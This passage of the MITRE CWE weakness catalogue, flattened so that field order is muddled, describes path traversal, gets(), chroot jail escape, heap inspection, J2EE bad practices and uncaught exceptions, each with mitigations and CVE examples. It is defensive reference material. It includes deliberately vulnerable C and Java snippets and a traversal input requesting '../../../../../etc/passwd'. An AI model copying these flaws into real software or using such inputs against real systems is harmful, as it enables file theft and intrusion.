- - - - - Undefined Parameter Error - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Observed_Example, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Description, Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2013-07-17 - updated Type - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Undefined Parameter Error - Failure to Handle Undefined Parameter - - - - The software does not handle or incorrectly handles inputs that are related to complex structures. - - - - - - Integrity - Unexpected State - - - - - Element Problems - - - - - PLOVER - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Description, Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2013-07-17 - updated Type - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Element Problems - - - - The software does not handle or incorrectly handles when a particular structural element is not completely specified. - - - - - - Resultant - - - - - - - - Architecture and Design - - - Implementation - - - - - Integrity - Unexpected State - - - - - Missing Element Error - - - - Can be primary to other problems. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2009-03-10 - updated Description, Name - - - CWE Content Team - MITRE - 2009-10-29 - updated Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2013-07-17 - updated Type - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Causal_Nature - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Missing Element Error - Failure to Handle Missing Element - - - - The software does not properly handle when a particular element is not completely specified. - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Integrity - Other - Varies by Context - Unexpected State - - - - - CVE-2002-1532 - HTTP GET without \r\n\r\n CRLF sequences causes product to wait indefinitely and prevents other users from accessing it. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1532 - - - CVE-2003-0195 - Partial request is not timed out. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0195 - - - CVE-2005-2526 - MFV. CPU exhaustion in printer via partial printing request then early termination of connection. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2526 - - - CVE-2002-1906 - CPU consumption by sending incomplete HTTP requests and leaving the connections open. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-1906 - - - - - Incomplete Element - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Observed_Example, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-10-29 - updated Description - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2013-07-17 - updated Type - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Incomplete Element - - - - The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize "../" sequences that can resolve to a location that is outside of that directory. - - This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory. - The "../" manipulation is the canonical manipulation for operating systems that use "/" as directory separators, such as UNIX- and Linux-based systems. In some cases, it is useful for bypassing protection schemes in environments for which "/" is supported but not the primary separator, such as Windows, which uses "\" but can also accept "/". - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Confidentiality - Integrity - Read Files or Directories - Modify Files or Directories - - - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - When validating filenames, use stringent allowlists that limit the character set to be used. If feasible, only allow a single "." character in the filename to avoid weaknesses such as CWE-23, and exclude directory separators such as "/" to avoid CWE-36. Use a list of allowable file extensions, which will help to avoid CWE-434. - Do not rely exclusively on a filtering mechanism that removes potentially dangerous characters. This is equivalent to a denylist, which may be incomplete (CWE-184). For example, filtering "/" is insufficient protection if the filesystem also supports the use of "\" as a directory separator. Another possible error could occur when the filtering is applied in a way that still produces dangerous data (CWE-182). For example, if "../" sequences are removed from the ".../...//" string in a sequential fashion, two instances of "../" would be removed from the original string, but the remaining characters would still form the "../" string. - - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - '../filedir - - - SFP16 - Path Traversal - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2010-06-21 - updated Description, Potential_Mitigations - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Path Issue - Dot Dot Slash - '../filedir' - - - - The software does not handle or incorrectly handles when two or more structural elements should be consistent, but are not. - - - - - - - - - - Architecture and Design - - - Implementation - - - - - Integrity - Other - Varies by Context - Unexpected State - - - - - Inconsistent Elements - - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Description, Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2013-07-17 - updated Type - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Type - - - CWE Content Team - MITRE - 2020-02-24 - updated Relationships - - Inconsistent Elements - Failure to Resolve Inconsistent Elements - - - - The software does not handle or incorrectly handles when a particular element is not the expected type, e.g. it expects a digit (0-9) but is provided with a letter (A-Z). - - - - - - - - - Architecture and Design - - - Implementation - - - - - Integrity - Other - Varies by Context - Unexpected State - - - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright. - - - - Implementation - Input Validation - Inputs should be decoded and canonicalized to the application's current internal representation before being validated (CWE-180). Make sure that the application does not decode the same input twice (CWE-174). Such errors could be used to bypass allowlist validation schemes by introducing dangerous inputs after they have been checked. - - - - - CVE-1999-1156 - FTP server crash via PORT command with non-numeric character. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-1999-1156 - - - CVE-2004-0270 - Anti-virus product has assert error when line length is non-numeric. - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0270 - - - - - Wrong Data Type - - - FIO37-C - Do not assume that fgets() or fgetws() returns a nonempty string when successful - CWE More Abstract - - - - - - - Probably under-studied. - - - - PLOVER - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations, Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-03-10 - updated Description, Name - - - CWE Content Team - MITRE - 2009-07-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2009-10-29 - updated Description - - - CWE Content Team - MITRE - 2011-03-29 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships - - - CWE Content Team - MITRE - 2017-11-08 - updated Applicable_Platforms, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated Potential_Mitigations, Relationships - - - CWE Content Team - MITRE - 2020-06-25 - updated Potential_Mitigations - - Wrong Data Type - Failure to Handle Wrong Data Type - - - - The program calls a function that can never be guaranteed to work safely. - Certain functions behave in dangerous ways regardless of how they are used. Functions in this category were often implemented without taking security concerns into account. The gets() function is unsafe because it does not perform bounds checking on the size of its input. An attacker can easily send arbitrarily-sized input to gets() and overflow the destination buffer. Similarly, the >> operator is unsafe to use when reading into a statically-allocated character array because it does not perform bounds checking on the size of its input. An attacker can easily send arbitrarily-sized input to the >> operator and overflow the destination buffer. - - - - - - Primary - - - - - - - - - Implementation - - - High - - - Other - Varies by Context - - - - - Implementation - Requirements - Ban the use of dangerous functions. Use their safe equivalent. - - - Testing - Use grep or static analysis tools to spot usage of dangerous functions. - - - - - The code below calls gets() to read information into a buffer. - - char buf[BUFSIZE];gets(buf); - - The gets() function in C is inherently unsafe. - - - The code below calls the gets() function to read in data from the command line. - - - char buf[24];printf("Please enter your name and press <Enter>\n");gets(buf);...} - - However, gets() is inherently unsafe, because it copies all input from STDIN to the buffer without checking size. This allows the user to provide a string that is larger than the buffer size, resulting in an overflow condition. - - - - - Dangerous Functions - - - POS33-C - Do not use vfork() - CWE More Abstract - - - SFP3 - Use of an improper API - - - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings, Type, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-10-29 - updated Description, Other_Notes, References - - - CWE Content Team - MITRE - 2010-02-16 - updated Demonstrative_Examples, References, Relationships - - - CWE Content Team - MITRE - 2010-04-05 - updated Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-07-30 - updated Demonstrative_Examples, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Causal_Nature, References, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2018-03-27 - updated References - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2021-03-15 - updated Demonstrative_Examples - - Dangerous Functions - Use of Inherently Dangerous Functions - - - - The program uses the chroot() system call to create a jail, but does not change the working directory afterward. This does not prevent access to files outside of the jail. - Improper use of chroot() may allow attackers to escape from the chroot jail. The chroot() function call does not change the process's current working directory, so relative paths may still refer to file system resources outside of the chroot jail after chroot() has been called. - - - - - - - Resultant - - - - - - - - - The chroot() system call allows a process to change its perception of the root directory of the file system. After properly invoking chroot(), a process cannot access any files outside the directory tree defined by the new root directory. Such an environment is called a chroot jail and is commonly used to prevent the possibility that a processes could be subverted and used to access unauthorized files. For instance, many FTP servers run in chroot jails to prevent an attacker who discovers a new vulnerability in the server from being able to download the password file or other sensitive files on the system. - - - - Implementation - REALIZATION: This weakness is caused during implementation of an architectural security tactic. - - - High - - - Confidentiality - Read Files or Directories - - - - - Consider the following source code from a (hypothetical) FTP server: - - chroot("/var/ftproot");...fgets(filename, sizeof(filename), network);localfile = fopen(filename, "r");while ((len = fread(buf, 1, sizeof(buf), localfile)) != EOF) {fwrite(buf, 1, sizeof(buf), network);}fclose(localfile); - - This code is responsible for reading a filename from the network, opening the corresponding file on the local machine, and sending the contents over the network. This code could be used to implement the FTP GET command. The FTP server calls chroot() in its initialization routines in an attempt to prevent access to files outside of /var/ftproot. But because the server does not change the current working directory by calling chdir("/"), an attacker could request the file "../../../../../etc/passwd" and obtain a copy of the system password file. - - - - File or Directory - - - - Directory Restriction - - - SFP17 - Failed chroot jail - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Background_Details, Description, Relationships, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2008-10-14 - updated Description - - - CWE Content Team - MITRE - 2009-03-10 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2010-12-13 - updated Demonstrative_Examples, Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Affected_Resources, Causal_Nature, Modes_of_Introduction, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References - - Directory Restriction - Failure to Change Working Directory in chroot Jail - - - - Using realloc() to resize buffers that store sensitive information can leave the sensitive information exposed to attack, because it is not removed from memory. - When sensitive data such as a password or an encryption key is not removed from memory, it could be exposed to an attacker using a "heap inspection" attack that reads the sensitive data using memory dumps or other methods. The realloc() function is commonly used to increase the size of a block of allocated memory. This operation often requires copying the contents of the old memory block into a new and larger block. This operation leaves the contents of the original block intact but inaccessible to the program, preventing the program from being able to scrub sensitive data from memory. If an attacker can later examine the contents of a memory dump, the sensitive data could be exposed. - - - - - - - - - - - Implementation - - - - - Confidentiality - Other - Read Memory - Other - Be careful using vfork() and fork() in security sensitive code. The process state will not be cleaned up and will contain traces of data from past use. - - - - - The following code calls realloc() on a buffer containing sensitive data: - - cleartext_buffer = get_secret();...cleartext_buffer = realloc(cleartext_buffer, 1024);...scrub_memory(cleartext_buffer, 1024); - - There is an attempt to scrub the sensitive data from memory, but realloc() is used, so it could return a pointer to a different part of memory. The memory that was originally allocated for cleartext_buffer could still contain an uncleared copy of the data. - - - - Memory - - - - Heap Inspection - - - MEM03-C - Clear sensitive information stored in reusable resources returned for reuse - - - SFP23 - Exposed Data - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - KDM Analytics - 2008-08-01 - added/updated white box definitions - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Name, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-10-14 - updated Relationships - - - CWE Content Team - MITRE - 2008-11-24 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples, Name - - - CWE Content Team - MITRE - 2009-10-29 - updated Common_Consequences, Description, Other_Notes - - - CWE Content Team - MITRE - 2010-12-13 - updated Name - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-09-13 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships, Taxonomy_Mappings, White_Box_Definitions - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - Heap Inspection - Failure to Clear Heap Memory Before Release - Failure to Clear Heap Memory Before Release (aka 'Heap Inspection') - Failure to Clear Heap Memory Before Release ('Heap Inspection') - - - - The J2EE application directly manages connections, instead of using the container's connection management facilities. - The J2EE standard forbids the direct management of connections. It requires that applications use the container's resource management facilities to obtain connections to resources. Every major web application container provides pooled database connection management as part of its resource management framework. Duplicating this functionality in an application is difficult and error prone, which is part of the reason it is forbidden under the J2EE standard. - - - - - - Primary - - - - - - - - Architecture and Design - - - Implementation - - - - - Other - Quality Degradation - - - - - In the following example, the class DatabaseConnection opens and manages a connection to a database for a J2EE application. The method openDatabaseConnection opens a connection to the database using a DriverManager to create the Connection object conn to the database specified in the string constant CONNECT_STRING. - - public class DatabaseConnection { - private static final String CONNECT_STRING = "jdbc:mysql://localhost:3306/mysqldb";private Connection conn = null; - public DatabaseConnection() {} - public void openDatabaseConnection() {try {conn = DriverManager.getConnection(CONNECT_STRING);} catch (SQLException ex) {...}} - // Member functions for retrieving database connection and accessing database... - } - - The use of the DriverManager class to directly manage the connection to the database violates the J2EE restriction against the direct management of connections. The J2EE application should use the web application container's resource management facilities to obtain a connection to the database as shown in the following example. - - public class DatabaseConnection { - - private static final String DB_DATASRC_REF = "jdbc:mysql://localhost:3306/mysqldb";private Connection conn = null; - public DatabaseConnection() {} - public void openDatabaseConnection() { - try { - InitialContext ctx = new InitialContext();DataSource datasource = (DataSource) ctx.lookup(DB_DATASRC_REF);conn = datasource.getConnection(); - - } catch (NamingException ex) {...}} catch (SQLException ex) {...} - } - // Member functions for retrieving database connection and accessing database... - } - - - - - - J2EE Bad Practices: getConnection() - - - SFP3 - Use of an improper API - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2010-04-05 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2014-06-23 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Causal_Nature, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - J2EE Bad Practices: getConnection() - - - - The J2EE application directly uses sockets instead of using framework method calls. - - The J2EE standard permits the use of sockets only for the purpose of communication with legacy systems when no higher-level protocol is available. Authoring your own communication protocol requires wrestling with difficult security issues. - Without significant scrutiny by a security expert, chances are good that a custom communication protocol will suffer from security problems. Many of the same issues apply to a custom implementation of a standard protocol. While there are usually more resources available that address security concerns related to implementing a standard protocol, these resources are also available to attackers. - - - - - - - Resultant - - - - - - - - Architecture and Design - - - Implementation - - - - - Other - Quality Degradation - - - - - Architecture and Design - Use framework method calls instead of using sockets directly. - - - - - The following example opens a socket to connect to a remote server. - - public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { - - - // Perform servlet tasks. - ... - - // Open a socket to a remote server (bad). - Socket sock = null; - try { - sock = new Socket(remoteHostname, 3000); - - // Do something with the socket. - ... - } catch (Exception e) {...} - } - - A Socket object is created directly within the Java servlet, which is a dangerous way to manage remote connections. - - - - - J2EE Bad Practices: Sockets - - - SFP3 - Use of an improper API - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Sean Eidemiller - Cigital - 2008-07-01 - added/updated demonstrative examples - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2011-06-27 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Relationships - - - CWE Content Team - MITRE - 2012-10-30 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2014-06-23 - updated Description, Other_Notes - - - CWE Content Team - MITRE - 2014-07-30 - updated Demonstrative_Examples, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Causal_Nature, Relationships - - - CWE Content Team - MITRE - 2020-02-24 - updated References, Relationships - - J2EE Bad Practices: Sockets - - - - This entry has been deprecated because it was a duplicate of CWE-350. All content has been transferred to CWE-350. - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - CWE Content Team - MITRE - 2008-09-08 - updated Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-07-27 - updated Demonstrative_Examples - - - CWE Content Team - MITRE - 2010-02-16 - updated Relationships - - - CWE Content Team - MITRE - 2010-04-05 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2010-09-27 - updated Potential_Mitigations - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences - - - CWE Content Team - MITRE - 2012-05-11 - updated Demonstrative_Examples, References, Relationships - - - CWE Content Team - MITRE - 2013-06-23 - Critical - CWE-247 and CWE-292 deprecated and merged into CWE-350 to address duplicates. - - - CWE Content Team - MITRE - 2013-07-17 - updated Applicable_Platforms, Common_Consequences, Demonstrative_Examples, Description, Name, Other_Notes, Potential_Mitigations, References, Related_Attack_Patterns, Relationships, Time_of_Introduction, Type - - - CWE Content Team - MITRE - 2014-07-30 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2020-02-24 - updated References - - - CWE Content Team - MITRE - 2021-03-15 - updated Taxonomy_Mappings - - - CWE Content Team - MITRE - 2021-07-20 - updated Name, References - - Often Misused: Authentication - Reliance on DNS Lookups in a Security Decision - DEPRECATED (Duplicate): Reliance on DNS Lookups in a Security Decision - - - - An exception is thrown from a function, but it is not caught. - When an exception is not caught, it may cause the program to crash or expose sensitive information. - - - - - - - - - - - - - - Implementation - - - - - Availability - Confidentiality - DoS: Crash, Exit, or Restart - Read Application Data - An uncaught exception could cause the system to be placed in a state that could lead to a crash, exposure of sensitive information or other unintended behaviors. - - - - - The following example attempts to resolve a hostname. - - protected void doPost (HttpServletRequest req, HttpServletResponse res) throws IOException {String ip = req.getRemoteAddr();InetAddress addr = InetAddress.getByName(ip);...out.println("hello " + addr.getHostName());} - - A DNS lookup failure will cause the Servlet to throw an exception. - - - The _alloca() function allocates memory on the stack. If an allocation request is too large for the available stack space, _alloca() throws an exception. If the exception is not caught, the program will crash, potentially enabling a denial of service attack. _alloca() has been deprecated as of Microsoft Visual Studio 2005(R). It has been replaced with the more secure _alloca_s(). - - - EnterCriticalSection() can raise an exception, potentially causing the program to crash. Under operating systems prior to Windows 2000, the EnterCriticalSection() function can raise an exception in low memory situations. If the exception is not caught, the program will crash, potentially enabling a denial of service attack. - - - - - Often Misused: Exception Handling - - - ERR05-J - Do not let checked exceptions escape from a finally block - - - ERR06-J - Do not throw undeclared checked exceptions - - - EXP31-PL - Do not suppress or ignore exceptions - Exact - - - SFP4 - Unchecked Status Condition - - - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - Veracode - 2008-08-15 - Suggested OWASP Top Ten 2004 mapping - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2008-09-24 - Removed C from Applicable_Platforms - - - CWE Content Team - MITRE - 2008-10-14 - updated Applicable_Platforms - - - CWE Content Team - MITRE - 2009-03-10 - updated Relationships - - - CWE Content Team - MITRE - 2011-03-29 - updated Description, Relationships - - - CWE Content Team - MITRE - 2011-06-01 - updated Common_Consequences, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2012-05-11 - updated Common_Consequences, Demonstrative_Examples, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2014-07-30 - updated Demonstrative_Examples, Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2017-11-08 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-01-03 - updated Relationships, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2019-06-20 - updated Related_Attack_Patterns - - - CWE Content Team - MITRE - 2020-02-24 - updated References - - - CWE Content Team - MITRE - 2020-08-20 - updated Relationships - - - CWE Content Team - MITRE - 2020-12-10 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Relationships - - Often Misused: Exception Handling - - - - - This entry has been deprecated because of name - confusion and an accidental combination of multiple - weaknesses. Most of its content has been transferred to - CWE-785. - - This entry was deprecated for several reasons. The primary - reason is over-loading of the "path manipulation" term and the - description. The original description for this entry was the - same as that for the "Often Misused: File System" item in the - original Seven Pernicious Kingdoms paper. However, Seven - Pernicious Kingdoms also has a "Path Manipulation" phrase that - is for external control of pathnames (CWE-73), which is a - factor in symbolic link following and path traversal, neither - of which is explicitly mentioned in 7PK. Fortify uses the - phrase "Often Misused: Path Manipulation" for a broader range - of problems, generally for issues related to buffer - management. Given the multiple conflicting uses of this term, - there is a chance that CWE users may have incorrectly mapped - to this entry. - - The second reason for deprecation is an implied combination of - multiple weaknesses within buffer-handling functions. The - focus of this entry was generally on the path-conversion - functions and their association with buffer - overflows. However, some of Fortify's Vulncat entries have the - term "path manipulation" but describe a non-overflow weakness - in which the buffer is not guaranteed to contain the entire - pathname, i.e., there is information truncation (see CWE-222 - for a similar concept). A new entry for this non-overflow - weakness may be created in a future version of CWE. - - - - - - 7 Pernicious Kingdoms - 2006-07-19 - - - Eric Dalci - Cigital - 2008-07-01 - updated Time_of_Introduction - - - KDM Analytics - 2008-08-01 - added/updated white box definitions - - - CWE Content Team - MITRE - 2008-09-08 - updated Applicable_Platforms, Relationships, Other_Notes, Taxonomy_Mappings - - - CWE Content Team - MITRE - 2009-05-27 - updated Demonstrative_Examples - - - KDM Analytics - 2009-07-17 - Critical - Described inconsistencies in this entry, which the CWE Content Team had already slated for deprecation. - - - CWE Content Team - MITRE - 2009-07-27 - updated Affected_Resources, Applicable_Platforms, Demonstrative_Examples, Description, Maintenance_Notes, Name, Other_Notes, Potential_Mitigations, Relationships, Taxonomy_Mappings, Time_of_Introduction, Type, White_Box_Definitions - - - CWE Content Team - MITRE - 2009-10-29 - updated Relationships - - - CWE Content Team - MITRE - 2021-03-15 - updated Description, Maintenance_Notes - - Often Misused: Path Manipulation - - - - The software uses external input to construct a pathname that should be within a restricted directory, but it does not properly neutralize "/../" sequences that can resolve to a location that is outside of that directory. - - This allows attackers to traverse the file system to access files or directories that are outside of the restricted directory. - Sometimes a program checks for "../" at the beginning of the input, so a "/../" can bypass that check. - - - - - - - - - - Implementation - - - - - Confidentiality - Integrity - Read Files or Directories - Modify Files or Directories - - - - - Implementation - Input Validation - - Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. - When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." - Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's 